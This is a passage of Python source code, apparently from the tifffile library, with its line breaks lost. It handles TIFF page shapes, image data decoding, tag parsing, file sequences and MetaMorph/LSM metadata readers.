numpy.all(numpy.diff(self.uic2tag.time_created) != 0): self.axes = 'T' + self.axes else: self.axes = 'I' + self.axes # DISABLED if self.is_palette: assert False, "color mapping disabled for stk" if self.color_map.shape[1] >= 2**self.bits_per_sample: if image_depth == 1: self.shape = (3, planes, image_length, image_width) else: self.shape = (3, planes, image_depth, image_length, image_width) self.axes = 'C' + self.axes else: warnings.warn("palette cannot be applied") self.is_palette = False elif self.is_palette: samples = 1 if 'extra_samples' in self.tags: samples += len(self.extra_samples) if self.is_contig: self._shape = (1, 1, image_depth, image_length, image_width, samples) else: self._shape = (1, samples, image_depth, image_length, image_width, 1) if self.color_map.shape[1] >= 2**self.bits_per_sample: if image_depth == 1: self.shape = (3, image_length, image_width) self.axes = 'CYX' else: self.shape = (3, image_depth, image_length, image_width) self.axes = 'CZYX' else: warnings.warn("palette cannot be applied") self.is_palette = False if image_depth == 1: self.shape = (image_length, image_width) self.axes = 'YX' else: self.shape = (image_depth, image_length, image_width) self.axes = 'ZYX' elif self.is_rgb or samples_per_pixel > 1: if self.is_contig: self._shape = (1, 1, image_depth, image_length, image_width, samples_per_pixel) if image_depth == 1: self.shape = (image_length, image_width, samples_per_pixel) self.axes = 'YXS' else: self.shape = (image_depth, image_length, image_width, samples_per_pixel) self.axes = 'ZYXS' else: self._shape = (1, samples_per_pixel, image_depth, image_length, image_width, 1) if image_depth == 1: self.shape = (samples_per_pixel, image_length, image_width) self.axes = 'SYX' else: self.shape = (samples_per_pixel, image_depth, image_length, image_width) self.axes = 'SZYX' if False and self.is_rgb and 'extra_samples' in self.tags: # DISABLED: only use RGB and first alpha channel if exists extra_samples = self.extra_samples if self.tags['extra_samples'].count == 1: extra_samples = (extra_samples, ) for exs in extra_samples: if exs in ('unassalpha', 'assocalpha', 'unspecified'): if self.is_contig: self.shape = self.shape[:-1] + (4,) else: self.shape = (4,) + self.shape[1:] break else: self._shape = (1, 1, image_depth, image_length, image_width, 1) if image_depth == 1: self.shape = (image_length, image_width) self.axes = 'YX' else: self.shape = (image_depth, image_length, image_width) self.axes = 'ZYX' if not self.compression and 'strip_byte_counts' not in tags: self.strip_byte_counts = ( product(self.shape) * (self.bits_per_sample // 8), ) assert len(self.shape) == len(self.axes) def asarray(self, squeeze=True, colormapped=True, rgbonly=False, scale_mdgel=False, memmap=False, reopen=True): """Read image data from file and return as numpy array. Raise ValueError if format is unsupported. If any of 'squeeze', 'colormapped', or 'rgbonly' are not the default, the shape of the returned array might be different from the page shape. Parameters ---------- squeeze : bool If True, all length-1 dimensions (except X and Y) are squeezed out from result. colormapped : bool If True, color mapping is applied for palette-indexed images. rgbonly : bool If True, return RGB(A) image without additional extra samples. memmap : bool If True, use numpy.memmap to read arrays from file if possible. For use on 64 bit systems and files with few huge contiguous data. reopen : bool If True and the parent file handle is closed, the file is temporarily re-opened (and closed if no exception occurs). scale_mdgel : bool If True, MD Gel data will be scaled according to the private metadata in the second TIFF page. The dtype will be float32. """ if not self._shape: return if self.dtype is None: raise ValueError("data type not supported: %s%i" % ( self.sample_format, self.bits_per_sample)) if self.compression not in TIFF_DECOMPESSORS: raise ValueError("cannot decompress %s" % self.compression) tag = self.tags['sample_format'] if tag.count != 1 and any((i-tag.value[0] for i in tag.value)): raise ValueError("sample formats don't match %s" % str(tag.value)) fh = self.parent.filehandle closed = fh.closed if closed: if reopen: fh.open() else: raise IOError("file handle is closed") dtype = self._dtype shape = self._shape image_width = self.image_width image_length = self.image_length image_depth = self.image_depth typecode = self.parent.byteorder + dtype bits_per_sample = self.bits_per_sample if self.is_tiled: if 'tile_offsets' in self.tags: byte_counts = self.tile_byte_counts offsets = self.tile_offsets else: byte_counts = self.strip_byte_counts offsets = self.strip_offsets tile_width = self.tile_width tile_length = self.tile_length tile_depth = self.tile_depth if 'tile_depth' in self.tags else 1 tw = (image_width + tile_width - 1) // tile_width tl = (image_length + tile_length - 1) // tile_length td = (image_depth + tile_depth - 1) // tile_depth shape = (shape[0], shape[1], td*tile_depth, tl*tile_length, tw*tile_width, shape[-1]) tile_shape = (tile_depth, tile_length, tile_width, shape[-1]) runlen = tile_width else: byte_counts = self.strip_byte_counts offsets = self.strip_offsets runlen = image_width if any(o < 2 for o in offsets): raise ValueError("corrupted page") if memmap and self._is_memmappable(rgbonly, colormapped): result = fh.memmap_array(typecode, shape, offset=offsets[0]) elif self.is_contiguous: fh.seek(offsets[0]) result = fh.read_array(typecode, product(shape)) result = result.astype('=' + dtype) else: if self.is_contig: runlen *= self.samples_per_pixel if bits_per_sample in (8, 16, 32, 64, 128): if (bits_per_sample * runlen) % 8: raise ValueError("data and sample size mismatch") def unpack(x): try: return numpy.fromstring(x, typecode) except ValueError as e: # strips may be missing EOI warnings.warn("unpack: %s" % e) xlen = ((len(x) // (bits_per_sample // 8)) * (bits_per_sample // 8)) return numpy.fromstring(x[:xlen], typecode) elif isinstance(bits_per_sample, tuple): def unpack(x): return unpackrgb(x, typecode, bits_per_sample) else: def unpack(x): return unpackints(x, typecode, bits_per_sample, runlen) decompress = TIFF_DECOMPESSORS[self.compression] if self.compression == 'jpeg': table = self.jpeg_tables if 'jpeg_tables' in self.tags else b'' decompress = lambda x: decodejpg(x, table, self.photometric) if self.is_tiled: result = numpy.empty(shape, dtype) tw, tl, td, pl = 0, 0, 0, 0 for offset, bytecount in zip(offsets, byte_counts): fh.seek(offset) tile = unpack(decompress(fh.read(bytecount))) tile.shape = tile_shape if self.predictor == 'horizontal': numpy.cumsum(tile, axis=-2, dtype=dtype, out=tile) result[0, pl, td:td+tile_depth, tl:tl+tile_length, tw:tw+tile_width, :] = tile del tile tw += tile_width if tw >= shape[4]: tw, tl = 0, tl + tile_length if tl >= shape[3]: tl, td = 0, td + tile_depth if td >= shape[2]: td, pl = 0, pl + 1 result = result[..., :image_depth, :image_length, :image_width, :] else: strip_size = (self.rows_per_strip * self.image_width * self.samples_per_pixel) result = numpy.empty(shape, dtype).reshape(-1) index = 0 for offset, bytecount in zip(offsets, byte_counts): fh.seek(offset) strip = fh.read(bytecount) strip = decompress(strip) strip = unpack(strip) size = min(result.size, strip.size, strip_size, result.size - index) result[index:index+size] = strip[:size] del strip index += size result.shape = self._shape if self.predictor == 'horizontal' and not (self.is_tiled and not self.is_contiguous): # work around bug in LSM510 software if not (self.parent.is_lsm and not self.compression): numpy.cumsum(result, axis=-2, dtype=dtype, out=result) if colormapped and self.is_palette: if self.color_map.shape[1] >= 2**bits_per_sample: # FluoView and LSM might fail here result = numpy.take(self.color_map, result[:, 0, :, :, :, 0], axis=1) elif rgbonly and self.is_rgb and 'extra_samples' in self.tags: # return only RGB and first alpha channel if exists extra_samples = self.extra_samples if self.tags['extra_samples'].count == 1: extra_samples = (extra_samples, ) for i, exs in enumerate(extra_samples): if exs in ('unassalpha', 'assocalpha', 'unspecified'): if self.is_contig: result = result[..., [0, 1, 2, 3+i]] else: result = result[:, [0, 1, 2, 3+i]] break else: if self.is_contig: result = result[..., :3] else: result = result[:, :3] if squeeze: try: result.shape = self.shape except ValueError: warnings.warn("failed to reshape from %s to %s" % ( str(result.shape), str(self.shape))) if scale_mdgel and self.parent.is_mdgel: # MD Gel stores private metadata in the second page tags = self.parent.pages[1] if tags.md_file_tag in (2, 128): scale = tags.md_scale_pixel scale = scale[0] / scale[1] # rational result = result.astype('float32') if tags.md_file_tag == 2: result **= 2 # squary root data format result *= scale if closed: # TODO: file remains open if an exception occurred above fh.close() return result def _is_memmappable(self, rgbonly, colormapped): """Return if image data in file can be memory mapped.""" if not self.parent.filehandle.is_file or not self.is_contiguous: return False return not (self.predictor or (rgbonly and 'extra_samples' in self.tags) or (colormapped and self.is_palette) or ({'big': '>', 'little': '<'}[sys.byteorder] != self.parent.byteorder)) @lazyattr def is_contiguous(self): """Return offset and size of contiguous data, else None. Excludes prediction and colormapping. """ if self.compression or self.bits_per_sample not in (8, 16, 32, 64): return if self.is_tiled: if (self.image_width != self.tile_width or self.image_length % self.tile_length or self.tile_width % 16 or self.tile_length % 16): return if ('image_depth' in self.tags and 'tile_depth' in self.tags and (self.image_length != self.tile_length or self.image_depth % self.tile_depth)): return offsets = self.tile_offsets byte_counts = self.tile_byte_counts else: offsets = self.strip_offsets byte_counts = self.strip_byte_counts if len(offsets) == 1: return offsets[0], byte_counts[0] if self.is_stk or all(offsets[i] + byte_counts[i] == offsets[i+1] or byte_counts[i+1] == 0 # no data/ignore offset for i in range(len(offsets)-1)): return offsets[0], sum(byte_counts) def __str__(self): """Return string containing information about page.""" s = ', '.join(s for s in ( ' x '.join(str(i) for i in self.shape), str(numpy.dtype(self.dtype)), '%s bit' % str(self.bits_per_sample), self.photometric if 'photometric' in self.tags else '', self.compression if self.compression else 'raw', '|'.join(t[3:] for t in ( 'is_stk', 'is_lsm', 'is_nih', 'is_ome', 'is_imagej', 'is_micromanager', 'is_fluoview', 'is_mdgel', 'is_mediacy', 'is_sgi', 'is_reduced', 'is_tiled', 'is_contiguous') if getattr(self, t))) if s) return "Page %i: %s" % (self.index, s) def __getattr__(self, name): """Return tag value.""" if name in self.tags: value = self.tags[name].value setattr(self, name, value) return value raise AttributeError(name) @lazyattr def uic_tags(self): """Consolidate UIC tags.""" if not self.is_stk: raise AttributeError("uic_tags") tags = self.tags result = Record() result.number_planes = tags['uic2tag'].count if 'image_description' in tags: result.plane_descriptions = self.image_description.split(b'\x00') if 'uic1tag' in tags: result.update(tags['uic1tag'].value) if 'uic3tag' in tags: result.update(tags['uic3tag'].value) # wavelengths if 'uic4tag' in tags: result.update(tags['uic4tag'].value) # override uic1 tags uic2tag = tags['uic2tag'].value result.z_distance = uic2tag.z_distance result.time_created = uic2tag.time_created result.time_modified = uic2tag.time_modified try: result.datetime_created = [ julian_datetime(*dt) for dt in zip(uic2tag.date_created, uic2tag.time_created)] result.datetime_modified = [ julian_datetime(*dt) for dt in zip(uic2tag.date_modified, uic2tag.time_modified)] except ValueError as e: warnings.warn("uic_tags: %s" % e) return result @lazyattr def imagej_tags(self): """Consolidate ImageJ metadata.""" if not self.is_imagej: raise AttributeError("imagej_tags") tags = self.tags if 'image_description_1' in tags: # MicroManager result = imagej_description(tags['image_description_1'].value) else: result = imagej_description(tags['image_description'].value) if 'imagej_metadata' in tags: try: result.update(imagej_metadata( tags['imagej_metadata'].value, tags['imagej_byte_counts'].value, self.parent.byteorder)) except Exception as e: warnings.warn(str(e)) return Record(result) @lazyattr def is_rgb(self): """True if page contains a RGB image.""" return ('photometric' in self.tags and self.tags['photometric'].value == 2) @lazyattr def is_contig(self): """True if page contains a contiguous image.""" return ('planar_configuration' in self.tags and self.tags['planar_configuration'].value == 1) @lazyattr def is_palette(self): """True if page contains a palette-colored image and not OME or STK.""" try: # turn off color mapping for OME-TIFF and STK if self.is_stk or self.is_ome or self.parent.is_ome: return False except IndexError: pass # OME-XML not found in first page return ('photometric' in self.tags and self.tags['photometric'].value == 3) @lazyattr def is_tiled(self): """True if page contains tiled image.""" return 'tile_width' in self.tags @lazyattr def is_reduced(self): """True if page is a reduced image of another image.""" return bool(self.tags['new_subfile_type'].value & 1) @lazyattr def is_mdgel(self): """True if page contains md_file_tag tag.""" return 'md_file_tag' in self.tags @lazyattr def is_mediacy(self): """True if page contains Media Cybernetics Id tag.""" return ('mc_id' in self.tags and self.tags['mc_id'].value.startswith(b'MC TIFF')) @lazyattr def is_stk(self): """True if page contains UIC2Tag tag.""" return 'uic2tag' in self.tags @lazyattr def is_lsm(self): """True if page contains LSM CZ_LSM_INFO tag.""" return 'cz_lsm_info' in self.tags @lazyattr def is_fluoview(self): """True if page contains FluoView MM_STAMP tag.""" return 'mm_stamp' in self.tags @lazyattr def is_nih(self): """True if page contains NIH image header.""" return 'nih_image_header' in self.tags @lazyattr def is_sgi(self): """True if page contains SGI image and tile depth tags.""" return 'image_depth' in self.tags and 'tile_depth' in self.tags @lazyattr def is_ome(self): """True if page contains OME-XML in image_description tag.""" return ('image_description' in self.tags and self.tags[ 'image_description'].value.startswith(b'<?xml version=')) @lazyattr def is_shaped(self): """True if page contains shape in image_description tag.""" return ('image_description' in self.tags and self.tags[ 'image_description'].value.startswith(b'shape=(')) @lazyattr def is_imagej(self): """True if page contains ImageJ description.""" return ( ('image_description' in self.tags and self.tags['image_description'].value.startswith(b'ImageJ=')) or ('image_description_1' in self.tags and # Micromanager self.tags['image_description_1'].value.startswith(b'ImageJ='))) @lazyattr def is_micromanager(self): """True if page contains Micro-Manager metadata.""" return 'micromanager_metadata' in self.tags class TiffTag(object): """A TIFF tag structure. Attributes ---------- name : string Attribute name of tag. code : int Decimal code of tag. dtype : str Datatype of tag data. One of TIFF_DATA_TYPES. count : int Number of values. value : various types Tag data as Python object. value_offset : int Location of value in file, if any. All attributes are read-only. """ __slots__ = ('code', 'name', 'count', 'dtype', 'value', 'value_offset', '_offset', '_value', '_type') class Error(Exception): pass def __init__(self, arg, **kwargs): """Initialize instance from file or arguments.""" self._offset = None if hasattr(arg, '_fh'): self._fromfile(arg, **kwargs) else: self._fromdata(arg, **kwargs) def _fromdata(self, code, dtype, count, value, name=None): """Initialize instance from arguments.""" self.code = int(code) self.name = name if name else str(code) self.dtype = TIFF_DATA_TYPES[dtype] self.count = int(count) self.value = value self._value = value self._type = dtype def _fromfile(self, parent): """Read tag structure from open file. Advance file cursor.""" fh = parent.filehandle byteorder = parent.byteorder self._offset = fh.tell() self.value_offset = self._offset + parent.offset_size + 4 fmt, size = {4: ('HHI4s', 12), 8: ('HHQ8s', 20)}[parent.offset_size] data = fh.read(size) code, dtype = struct.unpack(byteorder + fmt[:2], data[:4]) count, value = struct.unpack(byteorder + fmt[2:], data[4:]) self._value = value self._type = dtype if code in TIFF_TAGS: name = TIFF_TAGS[code][0] elif code in CUSTOM_TAGS: name = CUSTOM_TAGS[code][0] else: name = str(code) try: dtype = TIFF_DATA_TYPES[self._type] except KeyError: raise TiffTag.Error("unknown tag data type %i" % self._type) fmt = '%s%i%s' % (byteorder, count*int(dtype[0]), dtype[1]) size = struct.calcsize(fmt) if size > parent.offset_size or code in CUSTOM_TAGS: pos = fh.tell() tof = {4: 'I', 8: 'Q'}[parent.offset_size] self.value_offset = offset = struct.unpack(byteorder+tof, value)[0] if offset < 0 or offset > parent.filehandle.size: raise TiffTag.Error("corrupt file - invalid tag value offset") elif offset < 4: raise TiffTag.Error("corrupt value offset for tag %i" % code) fh.seek(offset) if code in CUSTOM_TAGS: readfunc = CUSTOM_TAGS[code][1] value = readfunc(fh, byteorder, dtype, count) if isinstance(value, dict): # numpy.core.records.record value = Record(value) elif code in TIFF_TAGS or dtype[-1] == 's': value = struct.unpack(fmt, fh.read(size)) else: value = read_numpy(fh, byteorder, dtype, count) fh.seek(pos) else: value = struct.unpack(fmt, value[:size]) if code not in CUSTOM_TAGS and code not in (273, 279, 324, 325): # scalar value if not strip/tile offsets/byte_counts if len(value) == 1: value = value[0] if (dtype.endswith('s') and isinstance(value, bytes) and self._type != 7): # TIFF ASCII fields can contain multiple strings, # each terminated with a NUL value = stripascii(value) self.code = code self.name = name self.dtype = dtype self.count = count self.value = value def _correct_lsm_bitspersample(self, parent): """Correct LSM bitspersample tag. Old LSM writers may use a separate region for two 16-bit values, although they fit into the tag value element of the tag. """ if self.code == 258 and self.count == 2: # TODO: test this. Need example file. warnings.warn("correcting LSM bitspersample tag") fh = parent.filehandle tof = {4: '<I', 8: '<Q'}[parent.offset_size] self.value_offset = struct.unpack(tof, self._value)[0] fh.seek(self.value_offset) self.value = struct.unpack("<HH", fh.read(4)) def as_str(self): """Return value as human readable string.""" return ((str(self.value).split('\n', 1)[0]) if (self._type != 7) else '<undefined>') def __str__(self): """Return string containing information about tag.""" return ' '.join(str(getattr(self, s)) for s in self.__slots__) class TiffSequence(object): """Sequence of image files. The data shape and dtype of all files must match. Properties ---------- files : list List of file names. shape : tuple Shape of image sequence. axes : str Labels of axes in shape. Examples -------- >>> tifs = TiffSequence("test.oif.files/*.tif") >>> tifs.shape, tifs.axes ((2, 100), 'CT') >>> data = tifs.asarray() >>> data.shape (2, 100, 256, 256) """ _patterns = { 'axes': r""" # matches Olympus OIF and Leica TIFF series _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4})) _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))? _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))? _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))? _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))? _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))? _?(?:(q|l|p|a|c|t|x|y|z|ch|tp)(\d{1,4}))? """} class ParseError(Exception): pass def __init__(self, files, imread=TiffFile, pattern='axes', *args, **kwargs): """Initialize instance from multiple files. Parameters ---------- files : str, or sequence of str Glob pattern or sequence of file names. imread : function or class Image read function or class with asarray function returning numpy array from single file. pattern : str Regular expression pattern that matches axes names and sequence indices in file names. By default this matches Olympus OIF and Leica TIFF series. """ if isinstance(files, basestring): files = natural_sorted(glob.glob(files)) files = list(files) if not files: raise ValueError("no files found") #if not os.path.isfile(files[0]): # raise ValueError("file not found") self.files = files if hasattr(imread, 'asarray'): # redefine imread _imread = imread def imread(fname, *args, **kwargs): with _imread(fname) as im: return im.asarray(*args, **kwargs) self.imread = imread self.pattern = self._patterns.get(pattern, pattern) try: self._parse() if not self.axes: self.axes = 'I' except self.ParseError: self.axes = 'I' self.shape = (len(files),) self._start_index = (0,) self._indices = tuple((i,) for i in range(len(files))) def __str__(self): """Return string with information about image sequence.""" return "\n".join([ self.files[0], '* files: %i' % len(self.files), '* axes: %s' % self.axes, '* shape: %s' % str(self.shape)]) def __len__(self): return len(self.files) def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self.close() def close(self): pass def asarray(self, memmap=False, *args, **kwargs): """Read image data from all files and return as single numpy array. If memmap is True, return an array stored in a binary file on disk. The args and kwargs parameters are passed to the imread function. Raise IndexError or ValueError if image shapes don't match. """ im = self.imread(self.files[0], *args, **kwargs) shape = self.shape + im.shape if memmap: with tempfile.NamedTemporaryFile() as fh: result = numpy.memmap(fh, dtype=im.dtype, shape=shape) else: result = numpy.zeros(shape, dtype=im.dtype) result = result.reshape(-1, *im.shape) for index, fname in zip(self._indices, self.files): index = [i-j for i, j in zip(index, self._start_index)] index = numpy.ravel_multi_index(index, self.shape) im = self.imread(fname, *args, **kwargs) result[index] = im result.shape = shape return result def _parse(self): """Get axes and shape from file names.""" if not self.pattern: raise self.ParseError("invalid pattern") pattern = re.compile(self.pattern, re.IGNORECASE | re.VERBOSE) matches = pattern.findall(self.files[0]) if not matches: raise self.ParseError("pattern doesn't match file names") matches = matches[-1] if len(matches) % 2: raise self.ParseError("pattern doesn't match axis name and index") axes = ''.join(m for m in matches[::2] if m) if not axes: raise self.ParseError("pattern doesn't match file names") indices = [] for fname in self.files: matches = pattern.findall(fname)[-1] if axes != ''.join(m for m in matches[::2] if m): raise ValueError("axes don't match within the image sequence") indices.append([int(m) for m in matches[1::2] if m]) shape = tuple(numpy.max(indices, axis=0)) start_index = tuple(numpy.min(indices, axis=0)) shape = tuple(i-j+1 for i, j in zip(shape, start_index)) if product(shape) != len(self.files): warnings.warn("files are missing. Missing data are zeroed") self.axes = axes.upper() self.shape = shape self._indices = indices self._start_index = start_index class Record(dict): """Dictionary with attribute access. Can also be initialized with numpy.core.records.record. """ __slots__ = () def __init__(self, arg=None, **kwargs): if kwargs: arg = kwargs elif arg is None: arg = {} try: dict.__init__(self, arg) except (TypeError, ValueError): for i, name in enumerate(arg.dtype.names): v = arg[i] self[name] = v if v.dtype.char != 'S' else stripnull(v) def __getattr__(self, name): return self[name] def __setattr__(self, name, value): self.__setitem__(name, value) def __str__(self): """Pretty print Record.""" s = [] lists = [] for k in sorted(self): try: if k.startswith('_'): # does not work with byte continue except AttributeError: pass v = self[k] if isinstance(v, (list, tuple)) and len(v): if isinstance(v[0], Record): lists.append((k, v)) continue elif isinstance(v[0], TiffPage): v = [i.index for i in v if i] s.append( ("* %s: %s" % (k, str(v))).split("\n", 1)[0] [:PRINT_LINE_LEN].rstrip()) for k, v in lists: l = [] for i, w in enumerate(v): l.append("* %s[%i]\n %s" % (k, i, str(w).replace("\n", "\n "))) s.append('\n'.join(l)) return '\n'.join(s) class TiffTags(Record): """Dictionary of TiffTag with attribute access.""" def __str__(self): """Return string with information about all tags.""" s = [] for tag in sorted(self.values(), key=lambda x: x.code): typecode = "%i%s" % (tag.count * int(tag.dtype[0]), tag.dtype[1]) line = "* %i %s (%s) %s" % ( tag.code, tag.name, typecode, tag.as_str()) s.append(line[:PRINT_LINE_LEN].lstrip()) return '\n'.join(s) class FileHandle(object): """Binary file handle. * Handle embedded files (for CZI within CZI files). * Allow to re-open closed files (for multi file formats such as OME-TIFF). * Read numpy arrays and records from file like objects. Only binary read, seek, tell, and close are supported on embedded files. When initialized from another file handle, do not use it unless this FileHandle is closed. Attributes ---------- name : str Name of the file. path : str Absolute path to file. size : int Size of file in bytes. is_file : bool If True, file has a filno and can be memory mapped. All attributes are read-only. """ __slots__ = ('_fh', '_arg', '_mode', '_name', '_dir', '_offset', '_size', '_close', 'is_file') def __init__(self, arg, mode='rb', name=None, offset=None, size=None): """Initialize file handle from file name or another file handle. Parameters ---------- arg : str, File, or FileHandle File name or open file handle. mode : str File open mode in case 'arg' is a file name. name : str Optional name of file in case 'arg' is a file handle. offset : int Optional start position of embedded file. By default this is the current file position. size : int Optional size of embedded file. By default this is the number of bytes from the 'offset' to the end of the file. """ self._fh = None self._arg = arg self._mode = mode self._name = name self._dir = '' self._offset = offset self._size = size self._close = True self.is_file = False self.open() def open(self): """Open or re-open file.""" if self._fh: return # file is open if isinstance(self._arg, basestring): # file name self._arg = os.path.abspath(self._arg) self._dir, self._name = os.path.split(self._arg) self._fh = open(self._arg, self._mode) self._close = True if self._offset is None: self._offset = 0 elif isinstance(self._arg, FileHandle): # FileHandle self._fh = self._arg._fh if self._offset is None: self._offset = 0 self._offset += self._arg._offset self._close = False if not self._name: if self._offset: name, ext = os.path.splitext(self._arg._name) self._name = "%s@%i%s" % (name, self._offset, ext) else: self._name = self._arg._name self._dir = self._arg._dir else: # open file object self._fh = self._arg if self._offset is None: self._offset = self._arg.tell() self._close = False if not self._name: try: self._dir, self._name = os.path.split(self._fh.name) except AttributeError: self._name = "Unnamed stream" if self._offset: self._fh.seek(self._offset) if self._size is None: pos = self._fh.tell() self._fh.seek(self._offset, 2) self._size = self._fh.tell() self._fh.seek(pos) try: self._fh.fileno() self.is_file = True except Exception: self.is_file = False def read(self, size=-1): """Read 'size' bytes from file, or until EOF is reached.""" if size < 0 and self._offset: size = self._size return self._fh.read(size) def memmap_array(self, dtype, shape, offset=0, mode='r', order='C'): """Return numpy.memmap of data stored in file.""" if not self.is_file: raise ValueError("Can not memory map file without fileno.") return numpy.memmap(self._fh, dtype=dtype, mode=mode, offset=self._offset + offset, shape=shape, order=order) def read_array(self, dtype, count=-1, sep=""): """Return numpy array from file. Work around numpy issue #2230, "numpy.fromfile does not accept StringIO object" https://github.com/numpy/numpy/issues/2230. """ try: return numpy.fromfile(self._fh, dtype, count, sep) except IOError: if count < 0: size = self._size else: size = count * numpy.dtype(dtype).itemsize data = self._fh.read(size) return numpy.fromstring(data, dtype, count, sep) def read_record(self, dtype, shape=1, byteorder=None): """Return numpy record from file.""" try: rec = numpy.rec.fromfile(self._fh, dtype, shape, byteorder=byteorder) except Exception: dtype = numpy.dtype(dtype) if shape is None: shape = self._size // dtype.itemsize size = product(sequence(shape)) * dtype.itemsize data = self._fh.read(size) return numpy.rec.fromstring(data, dtype, shape, byteorder=byteorder) return rec[0] if shape == 1 else rec def tell(self): """Return file's current position.""" return self._fh.tell() - self._offset def seek(self, offset, whence=0): """Set file's current position.""" if self._offset: if whence == 0: self._fh.seek(self._offset + offset, whence) return elif whence == 2: self._fh.seek(self._offset + self._size + offset, 0) return self._fh.seek(offset, whence) def close(self): """Close file.""" if self._close and self._fh: self._fh.close() self._fh = None self.is_file = False def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self.close() def __getattr__(self, name): """Return attribute from underlying file object.""" if self._offset: warnings.warn( "FileHandle: '%s' not implemented for embedded files" % name) return getattr(self._fh, name) @property def name(self): return self._name @property def dirname(self): return self._dir @property def path(self): return os.path.join(self._dir, self._name) @property def size(self): return self._size @property def closed(self): return self._fh is None def read_bytes(fh, byteorder, dtype, count): """Read tag data from file and return as byte string.""" dtype = 'b' if dtype[-1] == 's' else byteorder+dtype[-1] return fh.read_array(dtype, count).tostring() def read_numpy(fh, byteorder, dtype, count): """Read tag data from file and return as numpy array.""" dtype = 'b' if dtype[-1] == 's' else byteorder+dtype[-1] return fh.read_array(dtype, count) def read_json(fh, byteorder, dtype, count): """Read JSON tag data from file and return as object.""" data = fh.read(count) try: return json.loads(unicode(stripnull(data), 'utf-8')) except ValueError: warnings.warn("invalid JSON `%s`" % data) def read_mm_header(fh, byteorder, dtype, count): """Read MM_HEADER tag from file and return as numpy.rec.array.""" return fh.read_record(MM_HEADER, byteorder=byteorder) def read_mm_stamp(fh, byteorder, dtype, count): """Read MM_STAMP tag from file and return as numpy.array.""" return fh.read_array(byteorder+'f8', 8) def read_uic1tag(fh, byteorder, dtype, count, plane_count=None): """Read MetaMorph STK UIC1Tag from file and return as dictionary. Return empty dictionary if plane_count is unknown. """ assert dtype in ('2I', '1I') and byteorder == '<' result = {} if dtype == '2I': # pre MetaMorph 2.5 (not tested) values = fh.read_array('<u4', 2*count).reshape(count, 2) result = {'z_distance': values[:, 0] / values[:, 1]} elif plane_count: for i in range(count): tagid = struct.unpack('<I', fh.read(4))[0] if tagid in (28, 29, 37, 40, 41): # silently skip unexpected tags fh.read(4) continue name, value = read_uic_tag(fh, tagid, plane_count, offset=True) result[name] = value return result def read_uic2tag(fh, byteorder, dtype, plane_count): """Read MetaMorph STK UIC2Tag from file and return as dictionary.""" assert dtype == '2I' and byteorder == '<' values = fh.read_array('<u4', 6*plane_count).reshape(plane_count, 6) return { 'z_distance': values[:, 0] / values[:, 1], 'date_created': values[:, 2], # julian days 'time_created': values[:, 3], # milliseconds 'date_modified': values[:, 4], # julian days 'time_modified': values[:, 5], # milliseconds } def read_uic3tag(fh, byteorder, dtype, plane_count): """Read MetaMorph STK UIC3Tag from file and return as dictionary.""" assert dtype == '2I' and byteorder == '<' values = fh.read_array('<u4', 2*plane_count).reshape(plane_count, 2) return {'wavelengths': values[:, 0] / values[:, 1]} def read_uic4tag(fh, byteorder, dtype, plane_count): """Read MetaMorph STK UIC4Tag from file and return as dictionary.""" assert dtype == '1I' and byteorder == '<' result = {} while True: tagid = struct.unpack('<H', fh.read(2))[0] if tagid == 0: break name, value = read_uic_tag(fh, tagid, plane_count, offset=False) result[name] = value return result def read_uic_tag(fh, tagid, plane_count, offset): """Read a single UIC tag value from file and return tag name and value. UIC1Tags use an offset. """ def read_int(count=1): value = struct.unpack('<%iI' % count, fh.read(4*count)) return value[0] if count == 1 else value try: name, dtype = UIC_TAGS[tagid] except KeyError: # unknown tag return '_tagid_%i' % tagid, read_int() if offset: pos = fh.tell() if dtype not in (int, None): off = read_int() if off < 8: warnings.warn("invalid offset for uic tag '%s': %i" % (name, off)) return name, off fh.seek(off) if dtype is None: # skip name = '_' + name value = read_int() elif dtype is int: # int value = read_int() elif dtype is Fraction: # fraction value = read_int(2) value = value[0] / value[1] elif dtype is julian_datetime: # datetime value = julian_datetime(*read_int(2)) elif dtype is read_uic_image_property: # ImagePropertyEx value = read_uic_image_property(fh) elif dtype is str: # pascal string size = read_int() if 0 <= size < 2**10: value = struct.unpack('%is' % size, fh.read(size))[0][:-1] value = stripnull(value) elif offset: value = '' warnings.warn("corrupt string in uic tag '%s'" % name) else: raise ValueError("invalid string size %i" % size) elif dtype == '%ip': # sequence of pascal strings value = [] for i in range(plane_count): size = read_int() if 0 <= size < 2**10: string = struct.unpack('%is' % size, fh.read(size))[0][:-1] string = stripnull(string) value.append(string) elif offset: warnings.warn("corrupt string in uic tag '%s'" % name) else: raise ValueError("invalid string size %i" % size) else: # struct or numpy type dtype = '<' + dtype if '%i' in dtype: dtype = dtype % plane_count if '(' in dtype: # numpy type value = fh.read_array(dtype, 1)[0] if value.shape[-1] == 2: # assume fractions value = value[..., 0] / value[..., 1] else: # struct format value = struct.unpack(dtype, fh.read(struct.calcsize(dtype))) if len(value) == 1: value = value[0] if offset: fh.seek(pos + 4) return name, value def read_uic_image_property(fh): """Read UIC ImagePropertyEx tag from file and return as dict.""" # TODO: test this size = struct.unpack('B', fh.read(1))[0] name = struct.unpack('%is' % size, fh.read(size))[0][:-1] flags, prop = struct.unpack('<IB', fh.read(5)) if prop == 1: value = struct.unpack('II', fh.read(8)) value = value[0] / value[1] else: size = struct.unpack('B', fh.read(1))[0] value = struct.unpack('%is' % size, fh.read(size))[0] return dict(name=name, flags=flags, value=value) def read_cz_lsm_info(fh, byteorder, dtype, count): """Read CS_LSM_INFO tag from file and return as numpy.rec.array.""" assert byteorder == '<' magic_number, structure_size = struct.unpack('<II', fh.read(8)) if magic_number not in (50350412, 67127628): raise ValueError("not a valid CS_LSM_INFO structure") fh.seek(-8, 1) if structure_size < numpy.dtype(CZ_LSM_INFO).itemsize: # adjust structure according to structure_size cz_lsm_info = [] size = 0 for name, dtype in CZ_LSM_INFO: size += numpy.dtype(dtype).itemsize if size > structure_size: break cz_lsm_info.append((name, dtype)) else: cz_lsm_info = CZ_LSM_INFO return fh.read_record(cz_lsm_info, byteorder=byteorder) def read_cz_lsm_floatpairs(fh): """Read LSM sequence of float pairs from file and return as list.""" size = struct.unpack('<i', 